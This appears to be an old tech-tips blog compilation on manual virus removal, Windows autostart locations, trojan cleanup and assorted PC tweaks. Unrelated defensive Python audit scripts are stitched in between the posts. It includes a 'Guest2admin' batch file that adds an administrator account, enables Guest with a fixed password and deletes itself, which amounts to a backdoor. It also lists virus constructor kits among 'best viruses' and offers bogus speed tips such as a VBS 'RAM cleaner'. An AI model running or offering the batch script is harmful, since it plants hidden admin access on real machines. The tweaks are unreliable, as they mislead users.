Wednesday, April 9, 2008

Manually Removing PC Viruses!

Have you ever been in the position of knowing you have a virus but having no antivirus? It is almost impossible to remove it manually without knowing a few tips and tricks.

After reading this tutorial I'm sure you will know how to manually remove most of the viruses lurking around. But that doesn't mean you shouldn't have any antivirus on your computer! Anyway, let's get started with the tutorial. I suppose you already know what safe mode is. If you don't, try pressing the F8 key a few times when you start your computer. You have to do this when your computer is about to start the first Windows components. In Win2k or XP I think you can press space and then F8 when it asks you if you want to go back to the previous working settings.

Enough talk about how to start your computer in safe mode. If you want to manually remove viruses you almost always have to do it in safe mode, because in safe mode most viruses don't start. Only a few Windows components are allowed to run in safe mode. So here is what to do, step by step:

1: Start your computer in safe mode.

2: If you know where the virus is hiding, delete the executable file.

3: Open the registry, go to the keys below, and add a : in front of the value of the string that you think is the virus. For example, if the string is "virus" and its value is "c:\virus.exe", change its value to ":c:\virus.exe". The : works like commenting out the value. If you are sure it is the virus you can just delete the string. Here are the keys you may want to look at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce

NOTE: Firefox users might not be able to view the full paths. To see them, make your text size smaller by pressing Ctrl and -.

4: The virus can start itself from some other places too. win.ini is the most common file that viruses use. So you should find the files named win.ini and system.ini and look through them to see if you find anything.

5: Look through the startup folder, which is normally located in your profile directory under \Start Menu\Programs\Startup.

6: Try searching for the virus executable to see if it is hiding in some other place.

7: Finally, look through the list of services that Windows is running. This list is usually found under Control Panel - Administrative Tools - Services.

After these 7 steps just reboot your computer in normal mode and try to figure out if the virus is still there. If not, SUCCESS; if yes, go back to safe mode and hunt some more. Of course these 7 steps will not work on every virus out there, but they will on many of them.

Note: Be careful with the registry and don't mess it up. If you do, your computer may be gone, depending on what you mess up. I suggest you make a system restore point first, so in case something happens you can go back to it.

The World's best Viruses

1.W32.Bagle.AF
2.W32.Bagle.H
3.W32.Hiton.A
4.W32.MyDoom.F
5.W32.Netsky.Z
6.W32.Netsky.D
7.W32.Netsky.B
8.W32.Sober.F
9.W32.Sober.D
10.W32.Sober.C
11.W32.Sober
12.W32.Dumaru
13.W32.Sobig.F
14.W32.BugBear.B
15.W32.LovSan/Blaster1
16.W32.Sinapps
17.W32.Sunday
18.W32.Delta
19.W32.Gold
20.W32.Retro
21.W32.Koshi.1.9
22.Linux.ADM
23.Linux.Coco
24.W32.NBC
25.W32.Clickit
26.W32.Parasit
27.W32.PolySnakebyte
28.W32.RousSarcoma
29.W32.Hllw.Sydney@MM
30.CIH
31.I Love You
32.Melissa
33.w32nimda
34.Wagner 782
35.Casino
36.Harddrive-killer pro 5
37.Code red 1
38.Code red 2
39.Pokemon Pikachu
40.AIDS
41.hdfill
42.Blackday
43.Bulbasaur
44.Mirc.El_Che_is_alive
45.Kpmv.W2000.Poly
46.Mbop!
47.C-worm
48.Batschell
49.bat.antifa
50.Bat/BatXP.Iaafe
51.Bat\bun
52.Bat.Bush
53.BAT.Dolomite.worm
54.bat.****
55.bat/hotcakes
56.bat.ina
57.bat.junkboat
58.bat.soulcontrol
59.BatXP.Saturn
60.BAT/Calvin&Hobbes
61.claytron
62.HoloCaust
63.p2p.Opax
64.PERL.Nirvana
65.VBS/Artillery
66.vbs.eva
67.VBS/Evade
68.Vbs.Evion
69.w32.merkur.c
70.W32/Outsider
71.W32/Outsider B
72.W32/Outsider C
73.W32/Outsider D
74.W32/Outsider E
75.W32/Perrun
76.W97/Blackout
77.W97M/Authority
78.W97M/Chester
79.W97M/SFC
80.WinREG.Sptohell
81.Virenpaket 0
82.Virenpaket 1
83.Virenpaket 2
84.Virenpaket 3
85.Virenpaket 4
86.Virenpaket 5
87.Virenpaket 6
88.Virenpaket 7
89.Virenpaket 8
90.Virenpaket 9
91.Virenpaket 10
92.Virenpaket 11
93.Zed's Word Macro Virus Constructor
94.Windows Scripting Host Worm Constructor 1.0
95.Special Format Generator 2.0

Places where viruses and trojans hide

1. START-UP FOLDER. Windows opens every item in the Start Menu's Start Up folder. This folder is prominent in the Programs folder of the Start Menu.
Notice that I did not say that Windows "runs" every program that is represented in the Start Up folder. I said it "opens every item." There's an important difference.
Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs.
For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourite there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.)
2. REGISTRY. Windows executes all instructions in the "Run" section of the Windows Registry. Items in the "Run" section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above.
3. REGISTRY. Windows executes all instructions in the "RunServices" section of the Registry.
4. REGISTRY. Windows executes all instructions in the "RunOnce" part of the Registry.
5. REGISTRY. Windows executes instructions in the "RunServicesOnce" section of the Registry. (Windows uses the two "RunOnce" sections to run programs a single time only, usually on the next bootup after a program installation.)
7. REGISTRY. Windows executes instructions in the HKEY_CLASSES_ROOT\exefile\shell\open\command "%1" %* section of the Registry. Any command embedded here will open when any exe file is executed. Other possibilities:
[HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] ="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] ="\"%1\"%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] ="\"%1\"%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] ="\"%1\"%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] ="\"%1\"%*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] ="\"%1\"%*"
If keys don't have the "\"%1\" %*" value as shown, and are changed to something like "\"somefilename.exe %1\" %*", then they are automatically invoking the specified file.
8. BATCH FILE. Windows executes all instructions in the Winstart batch file, located in the Windows folder. (This file is unknown to nearly all Windows users and most Windows experts, and might not exist on your system. You can easily create it, however. Note that some versions of Windows call the Windows folder the "WinNT" folder.) The full filename is WINSTART.BAT.
9. INITIALIZATION FILE. Windows executes instructions in the "RUN=" line in the WIN.INI file, located in the Windows (or WinNT) folder.
10. INITIALIZATION FILE. Windows executes instructions in the "LOAD=" line in the WIN.INI file, located in the Windows (or WinNT) folder.
It also runs things in shell= in System.ini or c:\Windows\system.ini:
[boot]
shell=explorer.exe C:\Windows\filename
The file name following explorer.exe will start whenever Windows starts.
As with Win.ini, file names might be preceded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the Windows directory.
11. RELAUNCHING. Windows reruns programs that were running when Windows shut down. Windows cannot do this with most non-Microsoft programs, but it will do it easily with Internet Explorer and with Windows Explorer, the file-and-folder manager built into Windows. If you have Internet Explorer open when you shut Windows down, Windows will reopen IE with the same page open when you boot up again. (If this does not happen on your Windows PC, someone has turned that feature off. Use Tweak UI, the free Microsoft Windows user interface manager, to reactivate "Remember Explorer settings," or whatever it is called in your version of Windows.)
12. TASK SCHEDULER. Windows executes autorun instructions in the Windows Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all Windows versions except the first version of Windows 95, but is included in Windows 95 if the Microsoft Plus Pack was installed.
13. SECONDARY INSTRUCTIONS. Programs that Windows launches at startup are free to launch separate programs on their own. Technically, these are not programs that Windows launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their "parent" programs run.
14. C:\EXPLORER.EXE METHOD.
C:\Explorer.exe
Windows loads explorer.exe (typically located in the Windows directory) during the boot process. However, if c:\explorer.exe exists, it will be executed instead of the Windows explorer.exe. If c:\explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot.
If c:\explorer.exe is a trojan, it will be executed. Unlike all other autostart methods, there is no need for any file or registry changes - the file just simply has to be named c:\explorer.exe
15. ADDITIONAL METHODS.
Additional autostart methods. The first two are used by Trojan SubSeven 2.2.
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Icq Inet
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\test]
"Path"="test.exe"
"Startup"="c:\\test"
"Parameters"=""
"Enable"="Yes"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps]
This key specifies that all applications will be executed if ICQNET detects an Internet connection.
[HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap] ="Scrap object"
"NeverShowExt"=""
This key changes your file's specified extension.
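
The checks from the removal steps and from the autostart list above, as an added example (not code from the original posts): a Python script that reads the text of a .reg export plus win.ini and system.ini and reports Run-key entries (including ones disabled with the leading :), changed shell\open\command values, and run=, load= and shell= lines. The sample data, the sndtray.exe name and all function names are assumptions made for the illustration.

```python
import re

# Run-type keys named in the removal steps (matched case-insensitively,
# under both HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER).
RUN_SUFFIXES = tuple(
    "\\software\\microsoft\\windows\\currentversion\\" + leaf
    for leaf in ("run", "runonce", "runonceex", "runservices", "runservicesonce")
)
# File classes whose open command should be exactly "%1" %*. htafile is skipped
# here (assumption: a stock handler for it names mshta.exe).
SHELL_KEY = re.compile(r"\\(exe|com|bat|pif)file\\shell\\open\\command$")
# One string line of a .reg export: "name"="data", or @="data" for the default value.
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")="((?:[^"\\]|\\.)*)"$')


def unescape(text):
    # .reg files escape backslash and double quote with a leading backslash.
    return re.sub(r"\\(.)", r"\1", text)


def parse_reg(text):
    """Return {key: {value name: string data}}; non-string values are skipped."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1], {})
            continue
        match = VALUE_LINE.match(line)
        if match and current is not None:
            raw_name = match.group(1)
            name = "(Default)" if raw_name == "@" else unescape(raw_name[1:-1])
            current[name] = unescape(match.group(2))
    return keys


def audit_registry(keys):
    """List every Run-key entry and every changed shell\\open\\command default."""
    findings = []
    for key, values in keys.items():
        low = key.lower()
        if low.endswith(RUN_SUFFIXES):
            for name, data in values.items():
                # A leading ':' is the "commented out" marker from step 3.
                state = "disabled" if data.startswith(":") else "active"
                findings.append(("run-entry", state, key, name, data))
        elif SHELL_KEY.search(low):
            data = values.get("(Default)", "")
            if data.replace(" ", "") != '"%1"%*':
                findings.append(("shell-hijack", "active", key, "(Default)", data))
    return findings


def audit_ini(filename, text):
    """Flag run=/load= in [windows] and a shell= in [boot] that adds a program."""
    findings, section = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if "=" not in line or line.startswith(";"):
            continue
        option, _, value = line.partition("=")
        # strip() also removes the long run of spaces used to hide the file name
        option, value = option.strip().lower(), value.strip()
        if section == "windows" and option in ("run", "load") and value:
            findings.append(("ini-autostart", "active", filename, option, value))
        elif section == "boot" and option == "shell" and value.lower() != "explorer.exe":
            findings.append(("ini-shell", "active", filename, option, value))
    return findings


# Constructed sample input, not taken from a real machine.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundDriver"="C:\\WINDOWS\\system32\\sndtray.exe"
"virus"=":c:\\virus.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="somefilename.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\batfile\shell\open\command]
@="\"%1\" %*"
'''
SAMPLE_WIN_INI = r'''[windows]
load=
run=                                        c:\windows\temp\svhost.exe
'''
SAMPLE_SYSTEM_INI = r'''[boot]
shell=explorer.exe C:\WINDOWS\filename
'''

if __name__ == "__main__":
    report = audit_registry(parse_reg(SAMPLE_REG))
    report += audit_ini("win.ini", SAMPLE_WIN_INI)
    report += audit_ini("system.ini", SAMPLE_SYSTEM_INI)
    for kind, state, where, name, data in report:
        print(f"{kind:14} {state:9} {where} :: {name} = {data}")
```

A real Registry Editor 5.00 export is UTF-16 text, so read it with encoding="utf-16" before passing it to parse_reg.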

What is Virus-Trojan?

What is a trojan/worm/virus/logic bomb?
This FAQ answer was written by Theora:
Trojan: Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A trojan computer program is similar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than what it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it's not intentional, it's called a 'bug' or, in some cases, a feature :) Some virus scanning programs detect some trojans. Some virus scanning programs don't detect any trojans. No virus scanners detect all trojans.
Virus: A virus is an independent program which reproduces itself. It may attach to other programs, it may create copies of itself (as in companion viruses). It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some virus scanners detect some viruses. No virus scanners detect all viruses. No virus scanner can protect against "any and all viruses, known and unknown, now and forevermore".
Worm: Made famous by Robert Morris, Jr., worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the systems. They are self contained and use the networks to spread, in much the same way viruses use files to spread. Some people say the solution to viruses and worms is to just not have any files or networks. They are probably correct. We would include computers.
Logic Bomb: Code which will trigger a particular form of 'attack' when a designated condition is met. For instance, a logic bomb could delete all files on Dec. 5th. Unlike a virus, a logic bomb does not make copies of itself.

Windows XP hidden applications!

Run any of these applications: go to Start > Run and type the executable name (e.g. charmap).
Windows XP hidden apps:
1) Character Map = charmap.exe (very useful for finding unusual characters)
2) Disk Cleanup = cleanmgr.exe
3) Clipboard Viewer = clipbrd.exe (views contents of Windows clipboard)
4) Dr Watson = drwtsn32.exe (Troubleshooting tool)
5) DirectX diagnosis = dxdiag.exe (Diagnose & test DirectX, video & sound cards)
6) Private character editor = eudcedit.exe (allows creation or modification of characters)
7) IExpress Wizard = iexpress.exe (Create self-extracting / self-installing package)
8) Microsoft Synchronization Manager = mobsync.exe (appears to allow synchronization of files on the network for when working offline. Apparently undocumented).
9) Windows Media Player 5.1 = mplay32.exe (Retro version of Media Player, very basic).
10) ODBC Data Source Administrator = odbcad32.exe (something to do with databases)
11) Object Packager = packager.exe (to do with packaging objects for insertion in files, appears to have comprehensive help files).
12) System Monitor = perfmon.exe (very useful, highly configurable tool, tells you everything you ever wanted to know about any aspect of PC performance, for uber-geeks only)
13) Program Manager = progman.exe (Legacy Windows 3.x desktop shell).
14) Remote Access phone book = rasphone.exe (documentation is virtually non-existent).
15) Registry Editor = regedt32.exe [also regedit.exe] (for hacking the Windows Registry).
16) Network shared folder wizard = shrpubw.exe (creates shared folders on network).
17) File signature verification tool = sigverif.exe
18) Volume Control = sndvol32.exe (I've included this for those people that lose it from the System Notification area).
19) System Configuration Editor = sysedit.exe (modify System.ini & Win.ini just like in Win98!).
20) Syskey = syskey.exe (Secures XP Account database - use with care, it's virtually undocumented but it appears to encrypt all passwords, I'm not sure of the full implications).
21) Microsoft Telnet Client = telnet.exe
22) Driver Verifier Manager = verifier.exe (seems to be a utility for monitoring the actions of drivers, might be useful for people having driver problems. Undocumented).
23) Windows for Workgroups Chat = winchat.exe (appears to be an old NT utility to allow chat sessions over a LAN, help files available).
24) System configuration = msconfig.exe (can be used to control startup programs)
25) gpedit.msc (used to manage group policies and permissions)

New Yahoo! Messenger Virus Attack

New Yahoo! Messenger Virus Attack, how to prevent?

This Yahoo Messenger virus attack is one of the most powerful Trojans/viruses, released on 10 November 2007. If your computer is infected with this virus, it sends the nsl-school.org URL to everyone on your Yahoo Messenger friend list using your ID. So within a few hours many of your friends will get infected with it.
To solve this problem, just go through the steps below carefully.
What are those links? Nsl-school.org or other (do not open this URL in your browser).
If you are infected with it, what is going to happen?
1: It sets your default IE page to nsl-school.org, and you can't even change it back to another page. If you open IE on your computer, some malicious code will automatically be executed on it.
2: It disables the Task Manager and regedit, so you can't kill the Trojan process anymore.
3: The files installed by this virus are svhost.exe, svhost32.exe and internat.exe. You can find these files in the windows/ and temp/ directories.
4: It sends secured and protected information to the attacker.
How to remove this manually from your computer?
1: Close the IE browser. Log out of Messenger / remove the Internet cable.
2: To enable regedit, click Start, Run and type this command exactly as given below (better: copy and paste):
Code: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f
3: To enable Task Manager (to kill the process we need to enable Task Manager):
Click Start, Run and type this command exactly as given below (better: copy and paste):
Code: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
4: Now we need to change the default page of IE through regedit.
Start>Run>Regedit
In the locations below in regedit, change your default home page to hackgyan.com or other.
Code:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main
Just replace the attacker site with hackgyan.com or set it to a blank page.
5: Now we need to kill the process from the back end. For this, press "Ctrl + Alt + Del" and kill the process svhost32.exe. (More than one process may be running, so check properly.)
6: Delete the svhost32.exe and svhost.exe files from the Windows/ and temp/ directories. Or just search for svhost on your computer and delete those files.
7: Go to regedit, search for svhost and delete all the results you get. Code: Start>Run>Regedit
8: Restart the computer. That's it, now your system is virus free.
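
The file names in this post work because svhost.exe reads like the real svchost.exe. As an added example (not part of the original post), the Python sketch below flags executable paths whose name is one edit away from a known system binary, a system name found outside its normal directory (which also covers the C:\explorer.exe case described earlier), and anything running from a temp directory. The list of expected names and directories and the sample paths are assumptions made for the illustration.

```python
import ntpath

# Assumption: a short list of system binaries and the directory each belongs in.
EXPECTED = {
    "svchost.exe": r"c:\windows\system32",
    "lsass.exe": r"c:\windows\system32",
    "services.exe": r"c:\windows\system32",
    "winlogon.exe": r"c:\windows\system32",
    "csrss.exe": r"c:\windows\system32",
    "explorer.exe": r"c:\windows",
}


def edit_distance(a, b):
    """Levenshtein distance between two strings (row-by-row dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete from a
                           cur[j - 1] + 1,              # insert into a
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def reasons(path):
    """Return the reasons a Windows executable path looks suspicious (empty if none)."""
    folder, name = ntpath.split(path.lower())
    # Drop the extension and trailing digits so svhost32 is compared as svhost.
    stem = name.rsplit(".", 1)[0].rstrip("0123456789")
    found = []
    if name in EXPECTED:
        if folder != EXPECTED[name]:
            found.append("system name outside its directory")
    else:
        near = [known for known in EXPECTED
                if edit_distance(stem, known.rsplit(".", 1)[0]) <= 1]
        if near:
            found.append("imitates " + near[0])
    if "temp" in folder.split("\\"):
        found.append("runs from a temp directory")
    return found


def scan(paths):
    """Map each suspicious path to its list of reasons."""
    return {p: r for p in paths if (r := reasons(p))}


# Constructed sample: executable paths as a process listing might report them.
SAMPLE_PATHS = [
    r"C:\WINDOWS\system32\svchost.exe",
    r"C:\WINDOWS\svhost.exe",
    r"C:\WINDOWS\Temp\svhost32.exe",
    r"C:\WINDOWS\Temp\internat.exe",
    r"C:\explorer.exe",
    r"C:\WINDOWS\explorer.exe",
]

if __name__ == "__main__":
    for path, why in scan(SAMPLE_PATHS).items():
        print(path, "->", "; ".join(why))
```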

How to remove win32nsanti virus

Download Combofix: hxxp://download.bleepingcomputer.com/sUBs/Beta/ComboFix.exe and save it to the desktop.
Or you can search for and download Combofix.
Close all other browser windows.
Go to Start --> Run and copy/paste in the following:
"%userprofile%\desktop\combofix.exe" /killall
When finished, it will produce a logfile located at C:\ComboFix.txt.
Note: Do not mouse-click Combofix's window while it is running. That may cause your system to stall/hang.

1. Get this version of HijackThis from hxxp://danborg.org/spy/hjt/alternativ.exe
2. Save it in a permanent folder of your choice, such as C:\HJT\.
To create this specific folder on your hard drive: double-click the 'My Computer' icon on your desktop, then under the category hard disk drives double-click Local Disk, then select File -> New -> Folder and name it HJT.
3. Run HijackThis (alternativ.exe). Choose the "Do a system scan and save a log file" option to perform your scan. HijackThis will analyze your system and automatically open a Notepad text file containing the HijackThis log when the scan is finished. Open the text files containing the logs with a text editor and click Edit -> Select All, followed by Edit -> Copy. From within the browser window and with the message body text box selected, click Edit -> Paste.
Post the contents of ComboFix.txt in your next reply with a HijackThis log.

Windows Mobile

Windows Mobile is a compact operating system combined with a suite of basic applications for mobile devices based on the Microsoft Win32 API. Windows Mobile 6, formerly codenamed Crossbow, is the latest version of the Windows Mobile platform and was released on February 12, 2007 at the 3GSM World Congress 2007. It comes in three different versions: Windows Mobile 6 Standard for Smartphone, Windows Mobile 6 Professional for PDAs with phone functionality and Windows Mobile 6 Classic for plain PDAs without cellular radios. Windows Mobile 6, the next iteration of the Windows Mobile platform, brings new features and tools to Smartphone while still maintaining unrivaled flexibility, productivity and customization. Windows Mobile 6 also delivers a more powerful mobile communications experience to the user and a genuine Outlook Mobile experience through rich HTML support. Windows Mobile 6 provides an increased level of productivity by helping users reach deeper into information available on their devices to places they can't reach while at their desks. Windows Mobile 6 delivers increased device control and security, and greater operability with Exchange Server and other Microsoft assets so businesses can efficiently deploy, manage and help secure their mobile solutions.

Blu-ray-The Next-Generation Optical Disc

Blu-ray
Blu-ray, also known as Blu-ray Disc (BD), is the name of a next-generation optical disc format jointly developed by the Blu-ray Disc Association (BDA), a group of the world's leading consumer electronics, personal computer and media manufacturers (including Apple, Dell, Hitachi, HP, JVC, LG, Mitsubishi, Panasonic, Pioneer, Philips, Samsung, Sharp, Sony, TDK and Thomson). The format was developed to enable recording, rewriting and playback of high-definition video (HD), as well as storing large amounts of data. The format offers more than five times the storage capacity of traditional DVDs and can hold up to 25GB on a single-layer disc and 50GB on a dual-layer disc. This extra capacity combined with the use of advanced video and audio codecs will offer consumers an unprecedented HD experience.
While current optical disc technologies such as DVD, DVD±R, DVD±RW, and DVD-RAM rely on a red laser to read and write data, the new format uses a blue-violet laser instead, hence the name Blu-ray. Despite the different type of lasers used, Blu-ray products can easily be made backwards compatible with CDs and DVDs through the use of a BD/DVD/CD compatible optical pickup unit. The benefit of using a blue-violet laser (405nm) is that it has a shorter wavelength than a red laser (650nm), which makes it possible to focus the laser spot with even greater precision. This allows data to be packed more tightly and stored in less space, so it's possible to fit more data on the disc even though it's the same size as a CD/DVD. This together with the change of numerical aperture to 0.85 is what enables Blu-ray Discs to hold 25GB/50GB.
Blu-ray is currently supported by more than 180 of the world's leading consumer electronics, personal computer, recording media, video game and music companies. The format also has broad support from the major movie studios as a successor to today's DVD format. In fact, seven of the eight major movie studios (Disney, Fox, Warner, Paramount, Sony, Lionsgate and MGM) have released movies in the Blu-ray format and five of them (Disney, Fox, Sony, Lionsgate and MGM) are releasing their movies exclusively in the Blu-ray format. Many studios have also announced that they will begin releasing new feature films on Blu-ray Disc day-and-date with DVD, as well as a continuous slate of catalog titles every month.
The name Blu-ray Disc is derived from the blue-violet laser used to read and write this type of disc. Because of its shorter wavelength (405 nm), substantially more data can be stored on a Blu-ray Disc than on the DVD format, which uses a red (650 nm) laser. A single layer Blu-ray Disc can store 25 gigabytes (GB), over five times the size of a single layer DVD at 4.7 GB. A dual layer Blu-ray Disc can store 50 GB, almost 6 times the size of a dual layer DVD at 8.5 GB.
Blu-ray Disc is similar to PDD, another optical disc format developed by Sony (which has been available since 2004) but offering higher data transfer speeds. PDD was not intended for home video use and was aimed at business data archiving and backup.

Increase Your PC Speed by cleaning Your RAM

Clean your RAM with Notepad!
Clean RAM & make your computer faster...
You may notice that your system gets slower and slower when you play and work a lot on your PC. That's because your RAM is full of leftover pieces of processes that you do not need any more.
So create a new text file on your desktop and call it "RAMcleaner" or something similar.
1. Open Notepad.
2. Write FreeMem=Space(128000000)
3. Save it as RAMcleaner.vbs (you may choose the "All Files" option when you save it).
4. Just double-click the file and you are done.

Note: Don't wait for any particular program. When you double-click you will see a flash on your screen and that's it. And you will feel that your speed has increased.
You can adjust the size of the free RAM according to your RAM capacity.

Convert a Guest account into an Admin

Convert a Guest account into an Admin?

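All you need to do is copy the code below, paste it into Notepad and save it as Guest2admin.bat on your desktop.

@echo off
title Please wait...
cls
rem These net commands succeed only when run by an account that already has administrator rights
rem Create a new local account and put it in the Administrators group
net user Username Password /add
net localgroup Administrators Username /add
rem Enable Guest with the password 420 and move it from Guests to Administrators
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
rem The batch file deletes itself
del %0

Double-click the file to execute it, or type the code given above into a Command Prompt.

Note: this also creates a net account which is also accessible through the net's open port (basically it's a security leak).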
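
A defender's check for the changes this batch file makes, as an added example (not part of the original post): the Python script below parses the output of net localgroup Administrators, net localgroup Guests and net user Guest and reports unexpected administrators, a Guest account removed from the Guests group, and an active Guest account. The command output is constructed sample text in the English-locale layout, and the function names and the expected-administrators list are assumptions.

```python
import re


def group_members(output):
    """Return the member names listed by `net localgroup <group>`."""
    members, in_list = [], False
    for line in output.splitlines():
        line = line.strip()
        if line and set(line) == {"-"}:
            in_list = True            # the dashed rule precedes the member list
        elif in_list and line and not line.lower().startswith("the command completed"):
            members.append(line)
    return members


def audit_accounts(admins_out, guests_out, guest_user_out, expected_admins):
    """Compare captured net command output with the expected account state."""
    findings = []
    expected = {name.lower() for name in expected_admins}
    for member in group_members(admins_out):
        if member.lower() not in expected:
            findings.append("unexpected administrator: " + member)
    if "guest" not in {m.lower() for m in group_members(guests_out)}:
        findings.append("Guest removed from Guests group")
    active = re.search(r"^Account active\s+(\S+)", guest_user_out,
                       re.MULTILINE | re.IGNORECASE)
    if active and active.group(1).lower() == "yes":
        findings.append("Guest account is active")
    return findings


# Constructed sample output, as it would look after the batch file has run.
ADMINS_OUT = """Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Guest
Username
The command completed successfully.
"""
GUESTS_OUT = """Alias name     Guests
Comment        Guests have the same access as members of the Users group by default

Members

-------------------------------------------------------------------------------
The command completed successfully.
"""
GUEST_USER_OUT = """User name                    Guest
Account active               Yes
Account expires              Never
"""

if __name__ == "__main__":
    for finding in audit_accounts(ADMINS_OUT, GUESTS_OUT, GUEST_USER_OUT,
                                  expected_admins=["Administrator"]):
        print(finding)
```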

Changing doc file to pdf using Google Docs

Changing doc file to pdf using Google Docs?

Changing doc file to pdf using Google Docs!
Yes, this is true, you can change a doc file to pdf using Google Docs.
What you need to do is:

1. Upload your file to Google Docs.

2. Open the document, and go to File at the top left of your document.

3. Click File and then click Export as PDF.

4. Save the file as PDF. Your file is now converted and saved as a PDF file.


THE END

How to Auto DELETE temporary folder

How to Auto DELETE temporary folder ?


For Beginners

What we usually do is type "%temp%" {without quotes} in Start -> Run. This opens your temporary folder and then you can erase its contents easily, but still try this one too.


For Advanced Users

First go into gpedit.msc. Next select Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary Folder. Then right-click "Do Not Delete Temp Folder Upon Exit", go to Properties and hit Disable. Now the next time Windows puts a temp file in that folder it will automatically delete it when it's done!
Note: GPEDIT (Group Policy Editor) is only available in XP Pro.

Increase Your Internet speed

Follow these steps: go to Desktop -> My Computer (right-click) -> Properties -> Hardware tab -> Device Manager. In the Device Manager window go to Ports -> Communication Port (double-click to open it). In the Communication Port properties go to Port Settings, increase "Bits per second" to 128000 and change "Flow control" to Hardware.
Apply and see the result.

BOOST up your ACROBAT READER

BOOST up your ACROBAT READER {almost like NOTEPAD}
1. Go to the installation folder of Acrobat Reader (C:\program files\adobe\acrobat\reader\.. )
2. Move all the files and folders from the "plugins" directory to the "Optional" directory.
(I repeat: cut and paste the files, NOT copy and paste. Also make sure that Acrobat Reader is not open, or else it will lock the files and not allow you to move them.)
Now your Acrobat Reader will load very fast, almost as fast as Notepad.

Tuesday, April 8, 2008

Speed up BOOSTing by disabling unused ports

You may have tried many tweaks like modifying Windows XP start-up applications, prefetches, the unload DLLs method, etc. And yes, those methods do work for me. I have just accidentally found out another way to give you an extra boost in Windows XP's boot performance. This is done by disabling your unused devices in Device Manager. For example, if you don't have input devices connected to one of your USB or COM ports, disabling those ports will give you an extra performance boost when booting. Go to Control Panel -> System -> Hardware tab -> Device Manager, disable the devices that you don't use on your PC, and then restart.

How to Remove Windows XP's Messenger ?

Theoretically, you can get rid of it (as well as a few other things). Windows 2000 power users should already be familiar with this tweak.
Fire up the Windows Explorer and navigate your way to the %SYSTEMROOT%\INF folder. What the heck is that thingy with the percentage signs? It's a variable. For most people, %SYSTEMROOT% is C:\Windows. For others, it may be E:\WinXP. Get it? Okay, on with the hack!
